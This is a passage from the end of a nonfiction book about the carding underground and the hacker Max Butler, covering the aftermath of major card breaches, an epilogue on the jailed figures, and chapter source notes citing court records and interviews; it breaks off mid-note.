payroll +deposits, then sending the bulk of the cash to Eastern +Europe by Western Union. In 2009, the scheme’s first year +of widespread operation, banks and their customers lost an +estimated $120 million to the attack, with small businesses +the most common target. +Meanwhile, the sale of dumps continues, dominated now +by a new crop of vendors, same as the old crop—Mr. BIN; +Prada; Vitrium; The Thief. +Law enforcement, though, has claimed some lasting +victories. So far, no prominent English-speaking board has +risen to replace Carders Market and DarkMarket, and the +Eastern Europeans have become more cloistered and +protective. The big players have retreated to invitation-only +encrypted chat servers. The marketplace exists, but the +carders’ sense of invulnerability is shattered, and their +commerce is tariffed by paranoia and mistrust, thanks +primarily to the FBI, the Secret Service, their international +partners, and the unheralded work of the post office. +The veil of secrecy that once protected hackers and +corporations alike has mostly evaporated, with law +enforcement no longer going out of its way to shield +companies from responsibility for their poor security. More +than one of Gonzalez’s hacking targets were made public +for the first time in his federal indictment. +Finally, Mularski’s DarkMarket sting proved the feds +don’t have to get in bed with the bad guys to make busts. +All the lowest moments in the war on the computer + +All the lowest moments in the war on the computer +underground came about through the antics of informants. +Brett “Gollumfun” Johnson, the snitch who briefly worked as +a Carders Market administrator, turned the Secret +Service’s Operation Anglerphish into a circus by staging a +tax refund scam on the side. Albert Gonzalez provided the +clearest example. After Operation Firewall, the Secret +Service had been paying Gonzalez an annual salary of +$75,000 a year, even as he staged some of the largest +credit card hacks in history. +The post-Shadowcrew magstripe breaches led to a +reckoning in the civil courts. TJX paid $10 million to settle a +lawsuit filed by the attorneys general of 41 states and +another $40 million to Visa-issuing banks whose cards +were compromised. Banks and credit unions filed lawsuits +against Heartland Payment Systems for the massive +breach at the transaction-processing firm. Gonzalez’s +attacks also tore a hole in the credit card industry’s primary +bulwark against breaches: the so-called Payment Card +Industry—or PCI—Data Security Standard, which dictates +the steps merchants and processors must take to protect +systems handling credit card data. Heartland had been +certified PCI compliant before it was breached, and +Hannaford Brothers won the security certification even as +hackers were in its systems, stealing credit card swipes. +When the dust began to settle from Gonzalez’s large- +scale hacks, the smaller but far more numerous attacks +against restaurant point-of-sale systems began to come +out. Seven restaurants in Mississippi and Louisiana who’d +suffered intrusions figured out they were all using the same +point-of-sale system, the Aloha POS that was once Max’s +favorite target. The restaurants filed a class-action lawsuit +against the manufacturer and the company that sold them +the terminals, Louisiana-based Computer World, which +allegedly installed the remote-access software pcAnywhere +on all the machines and set the passwords on all of them to + +“computer.” +Underlying all these breaches is a single systemic +security flaw, exactly 3.375 inches long. Credit card +magstripes are a technological anachronism, a throwback +to the age of the eight-track tape, and today the United +States is virtually alone in nurturing this security hole. More +than a hundred other countries around the globe, in Europe, +Asia, and even Canada and Mexico, have implemented or +begun phasing in a far more secure system called EMV or +“chip-and-PIN.” +Instead of relying on a magstripe’s passive storage, +chip-and-PIN cards have a microchip embedded in the +plastic that uses a cryptographic handshake to authenticate +itself to the point-of-sale terminal and then to the +transaction-processing server. The system leaves nothing +for a hacker to steal—an intruder sitting on the wire could +eavesdrop on the entire transaction and still be unable to +clone a card, because the handshake sequence changes +every time. +White hats have devised attacks against chip-and-PIN, +but nothing that would lend itself to the mass market in +dumps that still exists today. So far, the biggest flaw in the +system is that it supports magstripe transactions as a +fallback for Americans traveling abroad or tourists visiting +the United States. +American banks and credit card companies have +rejected chip-and-PIN because of the enormous cost of +replacing hundreds of thousands of point-of-sale terminals +with new gear. In the end, the financial institutions have +decided their fraud losses are acceptable, even with the +likes of Iceman prowling their networks. + +EPILOGUE +n the Orange County men’s jail, Chris Aragon is lonely, +feeling abandoned by his friends and torn with grief that his +children are growing up without him. In October 2009, Clara +filed for divorce, seeking custody of their two children. His +girlfriend filed for child support. +Chris is studying the Bhagavad Gita and has a full-time +job as an inmate representative, helping several hundred +prisoners with legal matters, medical complaints, and +issues with the jail staff. His lawyer is playing a waiting +game, winning endless continuances for the criminal trial +that, if he loses, still carries a twenty-five-to-life term. After +Chris’s story was featured in a Wired magazine article on +Max, Chris was contacted by a Hollywood screenwriter and +a producer, but he didn’t respond. His mother suggested +he get an agent. +Max was assigned to FCI Lompoc, a low-security prison +an hour north of Santa Barbara, California. He hopes to use +his time to get a degree in physics or math—finally +completing the college education that was interrupted a +decade earlier in Boise. +He’s taken a mental inventory and is dismayed to find +that, despite everything, he still has the same impulses that +guided him into a life of hacking. “I’m not sure how to really +mitigate that, except ignore it,” he said in an interview from +jail. “I really believe that I’m reformed. But I don’t know +what’s going to happen later.” +It might seem a curious confession—admitting that the +elements of his personality that landed him in prison still +remain buried deep inside. But Max’s new self-awareness + +shows hope for real change. If one is born a hacker, no +amount of prison can drive it out. No therapy, or court +supervision, or prison workshop can offer reform. Max has +to reform himself—learn to own his actions and channel the +useful parts of his nature into something productive. +To that end, Max has volunteered to help the government +during his confinement, defending U.S. networks or +perhaps counterattacking foreign adversaries online. He +wrote out a menu of the services he could offer in a memo +headed “Why the USA Needs Max.” “I could penetrate +China’s military networks and military contractors,” he +suggested. “I can hack al Qaida.” He’s hopeful he might do +enough for the government that he could apply for a +lowered sentence from his judge. +It’s a long shot, and so far, the feds haven’t taken him up +on his offer. But a month after his sentencing, Max took a +baby step in that direction. Keith Mularski arranged for Max +to speak at the NCFTA for an eager audience of law +enforcement officials, students, financial and corporate +security experts, and academics from Carnegie Mellon. +Mularski checked him out of jail for the appearance. And +for an hour or two, Max Vision was a white hat again. + +NOTES + +Prologue +1 The taxi idled: Interviews with Max Vision. + +Chapter 1: The Key +1 As soon as the pickup truck rolled up to the curb: +Interviews with Max’s friend Tim Spencer. The +confrontation was also described in less detail by +Kimi Mack, Max’s ex-wife. Though Max could +intimidate bullies, he was never forced into a +physical confrontation with them. +2 Max’s parents had married young: State of Idaho +v. Max Butler, 1991. District Court of the Fourth +Judicial District, Ada County, Case No. 17519. +3 Robert Butler was a Vietnam veteran: State of +Idaho v. Max Butler and interviews with Max. +4 Weather Channel and nature documentaries: +Interviews with Kimi Winters and Max, respectively. +Max’s parents declined to be interviewed. +5 relaxed, and full-bore insane: Interviews with Tim +Spencer and with “Amy,” Max’s ex-girlfriend. Max’s +emotional problems at this time are also reflected in +court records in State of Idaho v. Max Butler. Max +acknowledges that his parents’ divorce had a deep +effect on him. +6 One day he emerged from his home: Interview with +Tim Spencer. Max confirms the incident but says he +lit the fire in a field adjacent to Spencer’s house. +7 The Meridian geeks had found the key ring: The +account of the master-key incident comes from +interviews with Tim Spencer. Court records confirm +Max’s juvenile conviction. Max admits the trespass +and chemical theft but declined to detail what + +occurred inside the school. John, his uncharged +accomplice in the burglary, declined comment. +8 Max became “Lord Max”: Max described his run-in +with the Secret Service in an interview. Also +referenced in a letter Max wrote that was filed in +State of Idaho v. Max Butler. + +Chapter 2: Deadly Weapons +1 THIS is the Rec Room!!!!: From MUDs to Virtual +Worlds, Don Mitchell, Microsoft social computing +group (March 23, 1995). +2 three hundred thousand host computers: +Numerous sources, including “Illuminating the net’s +Dark Ages,” Colin Barras, BBC News, August 23, +2007. +3 At Max’s urging: The events surrounding Max’s +assault conviction are based on transcripts and +other documents in State of Idaho v. Max Butler, as +well as interviews with Max and “Amy.” Where there +are significant factual disputes, they are noted +herein. +4 Then the dark truth: “The Dreaming City,” Michael +Moorcock, Science Fantasy 47 (June 1961). +5 Like a few of them, he started hacking the +computer right away: The hacking at BSU was +described by Max and David in interviews. David +described Max’s speed and impatience. BSU +professor Alexander Feldman discussed Max’s +computer ban in an interview and said Max had +probed other computers. +6 The sheriff called BSU’s network administrator at +two in the morning: Interview with Greg Jahn, a +former BSU system administrator responsible for +locking down Max’s account and preserving his files. + +Chapter 3: The Hungry Programmers +1 Idaho’s Supreme Court ruled: State v. Townsend, +124 Idaho 881, 865 P.2d 972 (1993). +2 Max found an unprotected FTP file server: Cinco +Network, Inc. v. Max Butler, 2:96-cv-1146, U.S. +District Court, Western District of Washington. Max +confirms this account but says he was primarily +interested in distributing music files, not pirated +software. +3 Chris Beeson, a young agent: The details of Max’s +assistance to the FBI come from court filings by the +defense attorney in his subsequent criminal case, +USA v. Max Ray Butler, 5:00-cr-20096, U.S. +District Court, Northern District of California. Details +of his recruitment and his relationship with the +agents come from interviews with Max and Max’s +Internet writings immediately following his guilty plea. +See +http://www.securityfocus.com/comments/articles/203/5729/threaded +(May 24, 2001). Max says he did not consider +himself an informant and only provided technical +information. + +Chapter 4: The White Hat +1 The first people to identify themselves as hackers: +The seminal work on the early hackers is Steven +Levy, Hackers: Heroes of the Computer Revolution +(New York: Anchor Press/Doubleday, 1984). Also +see Steve Wozniak and Gina Smith, iWoz: From +Computer Geek to Cult Icon: How I Invented the +Personal Computer, Co-Founded Apple, and Had +Fun Doing It (New York: W. W. Norton and +Company, 2006). +2 Tim was at work one day: This anecdote was +recalled by Tim Spencer. Max later recalled +Spencer’s advice in a letter to his sentencing judge +in Pittsburgh. +3 If there was one thing Max: Details of Max’s +relationship with Kimi come primarily from +interviews with Kimi. +4 Max went up to the city to visit Matt Harrigan: +Harrigan’s business and his work with Max were +described primarily by Harrigan, with some details +confirmed by Max. + +Chapter 5: Cyberwar! +1 In 1998, security experts discovered the latest flaw +in the code: This account of Max’s BIND attack +draws primarily from court records, including Max’s +written confession, interviews with Kimi, and +interviews with former air force investigator Eric +Smith. E-mail snippets between Max and the FBI +are from court records. Technical details come +primarily from a contemporaneous analysis of Max’s +code that can be found at http://www.mail- +archive.com/redhat- +list@redhat.com/msg01857.html. +2 issued an alert: “Inverse Query Buffer Overrun in +BIND 4.9 and BIND 8 Releases,” CERT Advisory +CA-98.05. +3 He sent Paxson an anonymous note: The note +was provided to the author by Vern Paxson. Max +confirmed that he sent it. + +Chapter 6: I Miss Crime +1 Kimi came home from school: Kimi described this +portion of the FBI search and its aftermath. +2 The FBI agents saw an opportunity in Max’s crime: +The details come from court filings by the defense +attorney in USA v. Max Ray Butler, 5:00-cr-20096, +U.S. District Court, Northern District of California. +3 Max was in heaven: Interviews with Max and Kimi. +4 Carlos Salgado Jr., a thirty-six-year-old computer +repairman: Details of the Salgado caper come from +interviews with Salgado, Salgado’s intended buyer, +the former system administrator of the ISP he +hacked, and court records in USA v. Carlos Felipe +Salgado, Jr., 3:97-cr-00197, U.S. District Court, +Northern District of California. The FBI declined to +comment on the case or to identify the victim of the +credit card breach. +5 The next day, Max met Harrigan at a Denny’s: +Interviews with Matt Harrigan and Max. + +Chapter 7: Max Vision +1 In late 1998, a former NSA cybersecurity: Interview +with Marty Roesch. +2 The reason I signed the confession: Interviews with +Kimi. In interviews with the author, Max expressed +the sentiment that his attachment to Kimi worsened +his legal situation. +3 “It’s his stuff”: Snort IDS mailing list, April 3, 2000. +(http://archives.neohapsis.com/archives/snort/2000- +04/0021.html). +4 Patrick “MostHateD” Gregory: “Computer Hacker +Sentenced,” U.S. Department of Justice press +release, September 6, 2000 +(http://www.justice.gov/criminal/cybercrime/gregorysen.htm). +5 Jason “Shadow Knight” Diekman: “Orange County +Man in Federal Custody for Hacking into +Government Computers,” U.S. Department of +Justice press release, September 21, 2000 +(http://www.justice.gov/criminal/cybercrime/diekman.htm). +6 Sixteen-year-old Jonathan James: “Juvenile +Computer Hacker Sentenced to Six Months in +Detention Facility,” U.S. Department of Justice +press release, September 21, 2000 +(http://www.justice.gov/criminal/cybercrime/comrade.htm). + +Chapter 8: Welcome to America +1 The two Russians: The details of the Invita sting +and the background of the Russian defendants +come primarily from court records, particularly USA +v. Vassily Gorshkov, 2:00:mj:00561, U.S. District +Court, Western District of Washington, as well as an +interview with a former FBI agent who worked on the +operation. The description of the Russians’ attire +and the reference to “the Expert Group” comes from +the excellent Washington Post story “A Tempting +Offer for Russian Pair” by Ariana Eunjung Cha, May +19, 2003. Quotes from within the Invita office come +from a transcript of the surveillance tape, with minor +grammatical changes for readability. + +Chapter 9: Opportunities +1 Max wore a blazer and rumpled cargo pants: The +author was present at Max’s sentencing hearing: +see “As the Worm Turns,” SecurityFocus, +Businessweek online, May 21, 2001 +(http://www.businessweek.com/technology/ +content/jul2001/tc20010726_443.htm). The letters +written on Max’s behalf are filed in USA v. Max Ray +Butler, 5:00-cr-20096, U.S. District Court, Northern +District of California. +2 Kimi was talking to him on the phone: Interview +with Kimi. +3 Max took the news with eerie calm: Interview with +Max. +4 “I’ve been talking to some people”: Interview with +Kimi. +5 Jeffrey James Norminton: Three of Norminton’s +close associates, Chris Aragon, Werner Janer, and +an anonymous source, described Norminton’s +alcoholism, and Aragon discussed its effect on +Norminton’s criminal productivity. Federal court +records show Norminton’s assignment to a drug and +alcohol rehabilitation center, and local court records +reflect two DUI arrests in 1990 (Orange County +Superior Court cases SM90577 and SM99355). +6 Norminton’s latest caper: USA v. Jeffrey James +Norminton, 2:98-cr-01260, U.S. District Court, +Central District of California. +7 Norminton made it clear that he saw real potential + +in Max: Interviews with Max, Chris Aragon, Werner +Janer, and another source familiar with Max’s and +Norminton’s jailhouse planning. +8 Max refused to sign: Kimi and Max agree on this. +Max says he refused to sign because Kimi +appeared to be wavering in her commitment to +divorce him. +9 I have been showing up at places: Max’s plea to +the security community is archived at +http://seclists.org/fulldisclosure/2002/Aug/257. +10 Even the Honeynet Project: Max says the project +shunned him. Founder Lance Spitzner did not +answer an inquiry from the author. +11 A global survey: Conducted by the Belgian +computer security company Scanit by way of a free +online vulnerability assessment tool, July 9, 2003. + +Chapter 10: Chris Aragon +1 Max met his future friend and criminal partner +Chris Aragon: Chris Aragon provided this account +of his first meeting with Max. Max doesn’t remember +where they first met. +2 The first robbery: The first attempted bank robbery +and the final successful one are described in court +records for USA v. Christopher John Aragon and +Albert Dwayne See, 81-cr-133, U.S District Court +for the District of Colorado. Additional details, +including the Dumpster incident and Aragon’s +lifestyle at the time, come from the author’s +interviews with Albert See, Aragon’s former crime +partner. In interviews, Aragon generally +acknowledged his bank robbery conviction and his +use of cocaine in this period. +3 he delved into credit card fraud: Per Aragon, and +confirmed by his former associate Werner Janer +and Max. +4 busted in a nationwide DEA undercover operation: +Kathryn Sosbe, “13 arrested in marijuana +bust/Colombian cartel used Springs as distribution +point,” Colorado Springs Gazette-Telegraph, +September 13, 1991. The Federal Bureau of +Prisons confirmed Aragon’s conviction and +sentencing on a charge of travel in interstate +commerce in aid of a business enterprise involving +the distribution of marijuana. +5 They wound up at the twenty-seven-story Holiday +Inn: The descriptions of Max and Aragon’s work +together here and throughout this book come + +primarily from interviews with Max and Aragon, as +well as their associates Werner Janer, Jonathan +Giannone, Tsengeltsetseg Tsetsendelger, and +another source involved in their crimes. Statements +provided by Jeffrey Norminton to the FBI, +summarized in court documents, also confirm many +of the details. +6 a white-hat hacker had invented a sport called “war +driving”: “Evil” Pete Shipley. See the author’s “War +Driving by the Bay,” Securityfocus.com, April 12, +2001 (http://www.securityfocus.com/news/192). +7 Janer offered to pay Max $5,000 to penetrate the +computer of a personal enemy: According to +Aragon, Max, and other sources. Janer says the +money was a loan. Charity confirms she received +the check on Max’s behalf. +8 Charity had only the broadest notion of what Max +was up to: Interviews with Charity Majors. +9 On a whim, he cracked Kimi’s computer: Interview +with Max. + +Chapter 11: Script’s Twenty-Dollar +Dumps +1 In the spring of 2001, some 150 Russian- +speaking computer criminals: Greg Crabb, U.S. +Postal Inspection Service. Roman Vega, currently in +U.S. custody, declined comment, as did the +Ukrainian widely suspected to be Script. +2 The discussion was sparked by: This history of the +carding forums comes from interviews with several +veteran carders, court records, interviews with law +enforcement officials, and a detailed examination of +the archives of Counterfeit Library, CarderPlanet, +and Shadowcrew. +3 the CVV began driving down fraud costs +immediately: Fraud figures come from a +presentation by Steven Johnson, director, Visa USA +Public Sector Sales, at the ninth annual GSA +SmartPay Conference in Philadelphia, August 23, +2007. +4 Chris decided to try some carding himself: Aragon +described his dealings with Script and his first +fraudulent purchases. + +Chapter 12: Free Amex! +1 Max broached his plan obliquely with Charity: +Interview with Charity Majors. +2 Internet Explorer can process more than just Web +pages: Drew Copley and eEye Digital Security, +“Internet Explorer Object Data Remote Execution +Vulnerability,” August 20, 2003. See CERT +Vulnerability Note VU#865940. The author located +Max’s attack code in a 2003 post to a hacker Web +forum, and computer security researcher Marc +Maiffret, an executive at eEye, confirmed that it +exploited this bug. Max remembers having the +vulnerability before it was public but isn’t sure how +he obtained it. He says eEye and its researchers +never leaked bugs in advance. +3 The disk was packed with FBI reports: Aragon, +Max, and Werner Janer all related the story of Max’s +intrusion into the FBI agent’s computer. Max, Janer, +and another source confirmed the agent’s name. +The agent, E. J. Hilbert, insists he was never hacked +and that Max likely penetrated an FBI honeypot filled +with fake information. + +Chapter 13: Villa Siena +1 Chris loaded blank PVC cards: Aragon admits his +credit card counterfeiting operation and provided +some details in interviews. The author examined +Aragon’s counterfeiting gear, and dozens of his +finished cards, at the Newport Beach Police +Department. The blow-by-blow on how the +equipment operates comes from interviews with +another experienced card counterfeiter who used +the same gear. +2 summoned his girls: Nancy Diaz Silva and +Elizabeth Ann Esquere have pleaded guilty for their +roles in Aragon’s operation. The other cashers were +described variously by Aragon’s former associates +Werner Janer, Jonathan Giannone, and +Tsengeltsetseg Tsetsendelger. +3 They’d be “sticking it to the man”: The Newport +Beach Police Department interviewed one of +Aragon’s later cashers, Sarah Jean Gunderson, in +2007. According to the police report: “Aragon stated +that it was ‘The man that we are sticking it to.’ +Gunderson said she knew it was wrong, however all +of her bills were getting paid.” Gunderson has +pleaded guilty. + +Chapter 14: The Raid +1 Chris Toshok awoke to the sound of his doorbell +buzzing: The details of the raid come primarily from +Toshok’s blog post “The whole surreal story,” I am +Pleased Precariously on January 15, 2004. +2 The FBI tried to lure Gembe to America: Cassell +Bryan-Low, “Hacker Hitmen,” Wall Street Journal, +October 6, 2003. Also see the author’s “Valve Tried +to Trick Half-Life 2 Hacker into Fake Job Interview,” +Wired.com, November 12, 2008. +(http://www.wired.com/threatlevel/2008/11/valve- +tricked-h/). +3 “Call me back when you’re not stoned”: Aragon +and Max both agree they fought over money. This +quote was recalled by Aragon. +4 sending them to Mexico to be fitted with clean +VINs: Interviews with Werner Janer and Jonathan +Giannone. Court records from Aragon’s San +Francisco arrest show his car was found to have +fake VIN tags, and as part of the case settlement +Aragon agreed to forfeit the vehicle. Aragon +declined to elaborate on that aspect of his activities +in interviews. + +Chapter 15: UBuyWeRush +1 Cesar had come to the underground by a +circuitous course: Interview with Carranza. +2 Selling equipment wasn’t in and of itself illegal: +Carranza pleaded guilty to money laundering in +December 2009 for running an e-gold exchange +service for carders under the UBuyWeRush brand. +U.S. v. Cesar Carranza, 1:08-cr-0026 U.S. District +Court for the Eastern District of New York. On +September 16, 2010, he was sentenced to six years +in prison. +3 The midsized Commerce Bank in Kansas City, +Missouri, may have been the first: Interview with +Mark J. Tomasic, former vice president of bank card +security with Commerce Bank. Also see “Hey, +banks, earn your stripes and fight ATM fraud +scams,” Kansas City Star, June 1, 2008. +4 Citibank, the nation’s largest consumer bank by +holdings, was the most high-profile victim: The +CVV attacks were widely known as the “Citibank +cash-outs” in carding circles. One of King Arthur’s +cashers, Kenneth Flury, was prosecuted in the +United States after admitting to stealing $384,000 in +Citibank ATM withdrawals in ten days in the spring +of 2004: U.S. v. Kenneth J. Flury, 1:05-cr-00515, +U.S. District Court for the Northern District of Ohio. +Citibank declined comment. To discourage +competitors, masterminds of the cash-outs often +claimed to have secret algorithms at their disposal +to generate workable magstripes. Max and other +carders confirmed this was a myth, as did FBI agent +J. Keith Mularski. Any data would work. + +5 once let it slip to a colleague that King was making +$1 million a week: Joseph Menn, “Fatal System +Error,” Public Affairs, January 2010. +6 Max had passed them all to Chris, who tore into +them with a vengeance: Interview with Max. Werner +Janer confirmed that Chris worked on the Citibank +cash-outs with Max, but Janer did not know the +details. Aragon declined to comment on the cash- +outs. +7 In just one year: Avitan Litan, “Criminals Exploit +Consumer Bank Account and ATM System +Weaknesses,” Gartner report G00129989, July 28, +2005. The loss estimate includes two types of +magstripe “discretionary” data that was not being +properly verified: the CVV and an optional PIN offset +used by some banks. + +Chapter 16: Operation Firewall +1 Banner ads appeared at the top of the site: This +and other reporting on Shadowcrew’s contents +comes from a mirror of the public portion of the site +captured in October 2004, immediately before it +was shuttered. +2 The posts disappeared at once: Interviews with +Max. Aragon independently stated that he and Max +tried to warn Shadowcrew members in advance of +the Operation Firewall raids. +3 The transactions ranged from the petty to the +gargantuan: Transaction details come from the +Operation Firewall indictment, U.S. v. Mantovani et +al., 2:04-cr-00786, U.S. District Court for the District +of New Jersey. +4 the Secret Service had noticed Ethics was selling: +Ethics’s hacking of the Secret Service agent was +first reported by the author: “Hacker penetrates T- +Mobile systems,” Securityfocus.com, January 11, +2005. His use of the BEA Systems exploit came +from sources close to the case and was first +reported by the author: “Known Hole Aided T-Mobile +Breach,” Wired.com, February 28, 2005 +(http://www.wired.com/politics/security/news/2005/02/66735). +Also see U.S. v. Nicolas Lee Jacobsen, 2:04-mj- +02550, U.S. District Court for the Central District of +California. +5 David Thomas was a lifelong scammer who’d +discovered the crime forums: For Thomas’s history +with the forums and the details of his work for the +FBI, see Kim Zetter, “I Was a Cybercrook for the + +FBI,” Wired.com, January 20, 2007. A U.S. +government source confirmed to the author that +Thomas had worked for the bureau while running his +forum, the Grifters. +6 “You don’t know who you have here”: From the +police report of Thomas’s arrest. “The problem with +the Bureau and the Secret Service is they look at the +largest biggest deals they can get in on,” Thomas +said in a 2005 interview with the author. “They want +the big enchilada.” +7 Their targets were marked on a map of the United +States: Brian Grow, “Hacker Hunters,” +Businessweek, May 30, 2005 +(http://www.businessweek.com/magazine +/content/05_22/b3935001_mz001.htm). The +identification of the Secret Service agents’ guns +also comes from this story. +8 Attorney General John Ashcroft boasted in a press +release: “Nineteen Individuals Indicted in Internet +‘Carding’ Conspiracy,” October 28, 2004 +(http://www.justice.gov/usao/nj/press/files/pdffiles/fire1028rel.pdf). + +Chapter 17: Pizza and Plastic +1 His scanning put him inside a Windows machine: +Max, Jonathan Giannone, and Brett Johnson each +independently identified the Pizza Schmizza in +Vancouver, Washington, as the source of Max’s +dumps in this period. The store manager said the +restaurant has since changed ownership, and she +had no knowledge of a breach. +2 Max couldn’t help feeling cheated yet again: +Interviews with Max. +3 Giannone was a smart middle-class kid with a +coke habit: Giannone confirmed the cocaine use +and all the details of his relationship with Max and +Aragon. He discussed the elevator button pressing +and the “bank robbery” prank in a chat with another +carder, a log of which was provided to the author. +Giannone confirmed in an interview that he +discussed the bank robbery hoax but said it was an +idle boast, and he didn’t actually pull it off. He said +he did not recall the elevator matter. +4 Giannone joined Shadowcrew and CarderPlanet +under the handle MarkRich: Giannone’s transition +through various handles was confirmed by Giannone +in an interview. Posts on the forums reviewed by the +author confirm he gave up his original handle after +being suspected of informing on an associate while +a juvenile. +5 launched a DDoS attack against JetBlue: +Giannone also discussed this attack in the +abovementioned chat logs. He confirmed it in +interviews with the author. + +6 the teen was running his operations from the +computer in his mother’s bedroom: Interviews with +Max. + +Chapter 18: The Briefing +1 Mularski had wanted to be an FBI agent since his +freshman year: Mularski’s biographical details and +his early work at NCFTA come from interviews with +Mularski. +2 The briefing for about half a dozen FBI agents: +Interviews with J. Keith Mularski and Postal +Inspector Greg Crabb. + +Chapter 19: Carders Market +1 “Sherwood Forest” wasn’t going to cut it for a +criminal marketplace: Aragon’s rejection of the +name comes from interviews with Max and a letter +Max later wrote his sentencing judge. +2 Janer, an avid watch collector, headed straight to +Richard’s: Janer explained his motives in the failed +watch caper in interviews, and Aragon confirmed he +provided Janer with cards as a favor. The criminal +case file describes how he was busted and his +subsequent cooperation, which Janer confirmed. +U.S. v. Werner William Janer, 3:06-cr-00003, U.S. +District Court for the District of Connecticut. +3 He hacked into a Florida data center run by +Affinity Internet: Court records confirm Carders +Market was hosted at Affinity at this time and that +Affinity later provided the FBI with a copy of the file +system. Max detailed the hack in interviews and in +contemporaneous postings to an Internet message +board as “Iceman.” +4 “I’m looking to make a good pile of money”: Chat +logs admitted as evidence in U.S. v. Jonathan +Giannone, 3:06-cr-01011, U.S. District Court for the +District of South Carolina. Online chats and +message board posts in this book are verbatim +when they appear within quotes, except for some +minor changes of grammar, punctuation, or spelling +for readability. + +Chapter 20: The Starlight Room +1 Tsengeltsetseg Tsetsendelger was being kissed: +Aragon, Max, and other sources confirm that +Tsetsendelger was recruited at the Starlight Room +and brought back to Aragon’s hotel. The details +come from interviews with Tsetsendelger. Liz and +Michelle Esquere declined comment. + +Chapter 22: Enemies +1 required technicians to reboot the machine every +49.7 days: Sources include Linda Geppert, “Lost +Radio Contact Leaves Pilots on Their Own,” IEEE +Spectrum, November 2004 +(http://spectrum.ieee.org/aerospace/aviation/lost- +radio-contact-leaves-pilots-on-their-own). +2 Giannone was pretty sure he couldn’t hack Macs: +Interview with Giannone. Max acknowledges that he +hacked Giannone frequently and tracked his +movements, and was also prone to sending long +messages to Giannone, and others, reflecting his +thoughts. He also clarified that he had no problem +hacking Macs. +3 So he reached out to Thomas by ICQ to try to +head off trouble: Max and Aragon discussed their +ongoing conflict with Thomas, who also detailed his +suspicions about Carders Market and Johnson on +his own website, the Grifters. Additionally, the author +obtained a log of the chat between Aragon and +Thomas quoted herein. + +Chapter 23: Anglerphish +1 He needed the money, plain and simple: +Johnson’s personal story comes from a sworn +affidavit he filed in his criminal case on April 13, +2007, and a letter he wrote his sentencing judge on +March 1, 2007. See U.S. v. Brett Shannon +Johnson, 3:06-cr-01129, U.S. District Court for the +District of South Carolina. +2 displayed simultaneously on a forty-two-inch +plasma screen hanging on the wall of the office: +Trial transcript in U.S. v. Jonathan Giannone, 3:06- +cr-01011, U.S. District Court for the District of South +Carolina. +3 The suspect had done everything but deep-clean +the carpet and paint the walls: Interview with Justin +Feffer, senior investigator, High Technology Crime +Division, Los Angeles County District Attorney’s +Office. Also see The People of the State of +California v. Shawn Mimbs, BA300469, Superior +Court of California, County of Los Angeles. Mimbs +declined comment. +4 The needles were steady as Johnson answered +the first two questions: According to Johnson. The +Secret Service declined to discuss Operation +Anglerphish. +5 “I will hound you for the rest of your life”: From +Johnson’s letter to his sentencing judge. + +Chapter 24: Exposure +1 “Tea, these girls are white trash”: Interview with +Tsengeltsetseg Tsetsendelger. Aragon mentioned +his fondness for Tsetsendelger in interviews and a +letter to the author. +2 Iceman, she’d decided, was pretty cool: Interview +with Tsetsendelger. Max says he was respectful in +chats with her but privately disliked her. +3 “Get out of here”: The incident at the pool comes +from interviews with Tsetsendelger and Giannone. +4 The bug was in the brief handshake sequence: +See CERT Vulnerability Note VU#117929. The bug +was discovered accidentally by Steve Wiseman of +Intelliadmin.com while he was writing and testing a +VNC client. Technical details come from an analysis +by James Evans; see http://marc.info/? +l=bugtraq&m=114771408013890&w=2. +5 a widely read computer security blog: “Schneier on +Security” by Bruce Schneier. +http://www.schneier.com/blog/archives/2006/06/interview_with_1.html. +6 a random blog called “Life on the Road”: See +http://afterlife.wordpress.com/2006/06/19/cardersmarket- +shadowcrew-and-credit-card-theft/ and +http://afterlife.wordpress.com/2006/07/12/carding- +web-sites/. + +Chapter 25: Hostile Takeover +1 Carders Market had six thousand members now: +Max, his former administrator Th3C0rrupted0ne, +and other carders say the site had in excess of six +thousand users after the hostile takeover. The +Justice Department, though, has put the number at +forty-five hundred. +2 secret even from his mother: According to his +mother, Marlene Aragon. + +Chapter 26: What’s in Your Wallet? +1 industry-funded report by Javelin Research: +Javelin Strategy and Research, “2007 Identity Fraud +Survey Report,” February 2007. The report was +sponsored by Visa USA, Wells Fargo, and +CheckFree, and then prominently cited by Visa USA +in a PowerPoint presentation at a Federal Trade +Commission workshop: “50% of known thieves +—were known by the victim!” (emphasis original). +Also see the author’s “Stolen Wallets, Not Hacks, +Cause the Most ID Theft? Debunked,” Wired.com, +February 12, 2009 +(http://www.wired.com/threatlevel/2009/02/stolen- +wallets/). +2 Visa’s private numbers told the real story: +Presentation by Steven Johnson, director, Visa +U.S.A. Public Sector Sales, at the ninth annual GSA +SmartPay Conference in Philadelphia, August 23, +2007. The presentation slides are marked “Visa +Confidential.” +3 C0rrupted had discovered the warez scene on +dial-up bulletin board systems: Biographical +information comes from telephone and online +interviews with Th3C0rrupted0ne, who spoke on +condition that his real name not be reported. +4 “I can’t believe how much you know about me”: +Interview with Aragon. +5 “Do not follow unsolicited links”: US-CERT +Technical Cyber Security Alert TA06-262A +(http://www.kb.cert.org/vuls/id/416092). + +6 Each copy of the message was customized: The +text of the spear phishing e-mail comes from an FBI +affidavit filed in U.S. v. Max Ray Butler, 3:07-mj- +00438, U.S. District Court for the Eastern District of +Virginia. “Mary Rheingold” is not a real name and +was added by the author in place of “[First Name +and Last Name of Recipient]” in the original court +document. + +Chapter 27: Web War One +1 “The Secret Service and FBI declined to comment +on Iceman or the takeovers”: Byron Acohido and +Jon Swartz, “Cybercrime flourishes in online hacker +forums,” USA Today, October 11, 2006. +2 “You’ve lost your fucking mind”: Interview with +Chris Aragon. +3 Bank of America and Capital One, in particular, +were huge institutions: Of his spear-phishing +attacks, Max was charged only with the Capital One +intrusion. The other victims were identified by Max. + +Chapter 28: Carder Court +1 it was just Silo trying to gather intelligence on +DarkMarket members for the police: Max, Mularski, +and Th3C0rrupted0ne identified Liske as Silo. In +extensive interviews, Liske was evasive about his +activities on the forums but spoke obliquely of his +work as an informant and his relationship with Max. +“Max was a good case. You know, he was a +challenge.” On the NCFTA Trojan, he said: “Isn’t it +reasonable to assume that whoever was dishing out +Trojans was actually dishing out Trojans to everyone +in the scene?” Later, “If it were malicious I could +have—someone could have caused real damage.” +Detective Mark Fenton of the Vancouver Police +Department said Canadian law prohibits him from +identifying or confirming an informant’s identity. On +the subject of whether he received hacked evidence +from informants, he said: “I know down in the States, +if an individual received any information that is +suspect, it’s not admissible. Up here, if someone +tells me something, I say, ‘Where did you hear that +from?’ He says, ‘I heard it from some guy.’ ” He +likened the arrangement to the Crime Stoppers tip +program. “Should Crime Stoppers be scrapped 